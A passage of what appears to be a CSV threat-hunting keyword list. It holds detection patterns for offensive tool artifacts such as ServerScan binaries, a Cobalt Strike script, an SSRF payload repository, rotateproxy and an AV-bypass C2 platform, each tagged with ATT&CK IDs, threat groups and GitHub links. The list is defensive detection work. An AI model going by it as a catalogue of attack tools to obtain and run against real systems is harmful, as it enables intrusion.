Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","#linux","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58459"
"*serverScan.win.cna*",".{0,1000}serverScan\.win\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58460"
"*serverscan_386.exe*",".{0,1000}serverscan_386\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58461"
"*ServerScan_Air_*.exe*",".{0,1000}ServerScan_Air_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58462"
"*ServerScan_Air_*_amd64*",".{0,1000}ServerScan_Air_.{0,1000}_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58463"
"*ServerScan_Air_*_i386*",".{0,1000}ServerScan_Air_.{0,1000}_i386.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58464"
"*serverscan_air-probes.exe*",".{0,1000}serverscan_air\-probes\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58465"
"*serverscan_amd64.exe*",".{0,1000}serverscan_amd64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58466"
"*ServerScan_Pro_*.exe*",".{0,1000}ServerScan_Pro_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58467"
"*ServerScan_Pro_*_amd64*",".{0,1000}ServerScan_Pro_.{0,1000}_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58468"
"*ServerScan_Pro_*_i386*",".{0,1000}ServerScan_Pro_.{0,1000}_i386.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58469"
"*serverscan64 *",".{0,1000}serverscan64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58470"
"*serverscan64 *tcp*",".{0,1000}serverscan64\s.{0,1000}tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58471"
"*serverscan86 *",".{0,1000}serverscan86\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","58472"
"*Server-Side-Request-Forgery-Payloads.*",".{0,1000}Server\-Side\-Request\-Forgery\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","58473"
"*service rotateproxy *",".{0,1000}service\srotateproxy\s.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","58479"
"*service/executable/",".{0,1000}service\/executable\/","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","N/A","10","10","686","112","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z","58483"
"*service/executable/compile.exe*",".{0,1000}service\/executable\/compile\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","N/A","10","10","686","112","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z","58484"
